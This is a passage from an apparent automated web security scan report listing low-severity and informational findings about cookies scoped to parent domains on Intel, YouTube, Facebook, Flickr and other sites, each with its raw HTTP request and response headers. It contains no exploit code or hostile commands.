<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.36. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:46 GMT
Content-Length: 578
Connection: close
Set-Cookie: PHPSESSID=00b720de8f611fc1545738ce8829c525; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:46 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.37. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=d05389110c2d2011353f05e29b09f232; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.38. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:44 GMT
Content-Length: 510
Connection: close
Set-Cookie: PHPSESSID=0b26808766bae72a678c3d39c963c461; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:44 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.39. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:40 GMT
Content-Length: 20519
Connection: close
Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com
Set-Cookie: loginpt=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.40. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.41. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 580
Connection: close
Set-Cookie: PHPSESSID=9f96f042ab3fd9912fec4ad3f015ce74; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.42. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.43. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 522
Connection: close
Set-Cookie: PHPSESSID=6d3271afbdfbfe0b4dd22d4ac3e9d131; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.44. http://software.intel.com/sites/academic_showcase/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /sites/academic_showcase/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/academic_showcase/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f5d3a15404bf24e6472fb4f75010d9f2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 50705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.45. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bu17mduk7is8kedhijahsmb432; expires=Tue, 01-Mar-2011 02:50:35 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 05 Feb 2011 23:16:15 GMT
ETag: "5bc4ba8773ce80095954738aa6226440"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.46. http://www.sigcse.org/
 previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sigcse.org
Path:   /<BR/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /<BR/ HTTP/1.1
Host: www.sigcse.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org
Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...

11.47. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a7fb3fbbcf17b918:TM=1296947840:LM=1296947840:S=gIUVNf4Re7eiOItb; expires=Mon, 04-Feb-2013 23:17:20 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

11.48. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

11.49. http://m.youtube.com/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.youtube.com
Path:   /details

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /details?v=i73f0pQBfQ8 HTTP/1.1
Host: m.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:21:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=cCy2OmNz5kY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:21:27 GMT
Set-Cookie: GEO=3216092b72f09a7334fb8e5b55f6c77fcwsAAAAzVVOtwdbzTU3bdw==; path=/; domain=.youtube.com
Set-Cookie: NO_MOBILE=; path=/; domain=.youtube.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://m.youtube.com/watch?v=i73f0pQBfQ8
Content-Type: text/html; charset=utf-8
Connection: close


11.50. http://www.facebook.com/Intel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Intel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Intel HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 43972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.51. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:08 GMT
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.52. http://www.flickr.com/apps/slideshow/show.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/slideshow/show.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/slideshow/show.swf HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT
Accept-Ranges: bytes
Content-Length: 118333
X-Served-By: www144.flickr.mud.yahoo.com
Cache-Control: private
Connection: close
Content-Type: application/x-shockwave-flash

CWS    ....x..|.P.....s..d..$I. Y...s.9G.E@.$9o..9l..D.9'.$9l`..7...z.;.W.W.U.7U6{.{z..Y..ou....|..z.....s...?.^8..p21.S.......s...=..pqq.ceuwwgq.`.w2ge...e}..........i.b..l...N.G.....N.....vT...F...O..
...[SNIP]...

11.53. http://www.flickr.com/photos/intelphotos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/intelphotos

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/intelphotos HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
X-Served-By: www40.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Intel Photos' Photostream</title>
   <meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

11.54. http://www.youtube.com/channelintel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /channelintel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channelintel HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:31 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/das_captcha?next=/channelintel
Content-Type: text/html; charset=utf-8
Connection: close


11.55. http://www.youtube.com/view_play_list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /view_play_list

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /view_play_list HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ
Content-Type: text/html; charset=utf-8
Connection: close


11.56. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

